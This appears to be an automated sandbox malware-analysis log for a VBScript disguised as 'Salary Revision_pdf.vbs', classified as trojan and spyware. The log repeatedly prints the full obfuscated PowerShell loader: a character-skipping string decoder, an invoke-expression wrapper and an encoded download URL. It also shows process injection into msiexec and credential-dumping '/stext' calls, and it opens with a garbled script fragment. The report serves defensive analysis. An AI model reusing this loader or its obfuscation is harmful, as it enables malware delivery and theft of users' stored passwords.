Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"rr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"ngs
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@16/12@2/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 11_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 13_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 11_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 11_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 11_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Taxlessly199.Cho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_322i4ygj.2sk.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000B.00000003.1810781718.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810663842.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1812069255.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810715475.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810925816.0000000004990000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Salary Revision_pdf.vbs ReversingLabs: Detection: 13%
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
